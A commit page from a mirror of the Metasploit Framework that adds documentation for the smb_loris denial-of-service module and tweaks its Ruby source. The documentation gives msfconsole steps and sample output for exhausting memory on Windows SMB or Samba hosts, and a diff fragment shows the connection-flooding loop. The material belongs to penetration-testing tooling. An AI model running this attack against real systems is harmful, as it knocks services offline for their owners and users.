infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

add module documentation 

add module docs for the new smbloris DoS
bug/bundler_fix
David Maloney 2017-08-04 16:10:44 -05:00
parent 15cc2a9dc0
commit 289f03241b
No known key found for this signature in database
GPG Key ID: DEDBA9DC3A913DB2
2 changed files with 48 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

43
documentation/modules/auxiliary/dos/smb/smb_lorris.md Normal file
View File

@ -0,0 +1,43 @@
## Vulnerable Application
This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability.
The module opens over 64,000 connections to the target service, so please make sure
your system ULIMIT is set appropriately to handle it. A single host running this module
can theoretically consume up to 8GB of memory on the target.
## Verification Steps
Example steps in this format (is also in the PR):
1. Start msfconsole
1. Do: `use auxiliary/dos/smb/smb_lorris`
1. Do: `set RHOST [IP]`
1. Do: `run`
1. Target should allocate increasing amounts of memory.
## Scenarios
###
```
msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
msf auxiliary(smb_loris) > set RHOST 192.168.172.138
RHOST => 192.168.172.138
msf auxiliary(smb_loris) >
msf auxiliary(smb_loris) > run
[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
....
```

6
modules/auxiliary/dos/smb/smb_loris.rb
View File

@ -27,6 +27,9 @@ class MetasploitModule < Msf::Auxiliary
large numbers of these sessions, the memory does not get freed, and the server
grinds to a halt. This vulnerability was originally disclosed by Sean Dillon
and Zach Harding.
DISCALIMER: This module opens a lot of simultaneous connections. Please check
your system's ULIMIT to make sure it can handle it.
},
'Author' =>
[
@ -52,7 +55,8 @@ class MetasploitModule < Msf::Auxiliary
linger = Socket::Option.linger(true, 60)
(1..65535).each do |src_port|
(1025..65535).each do |src_port|
print_status "Sending packet from Source Port: #{src_port}"
opts = {
'CPORT' => src_port,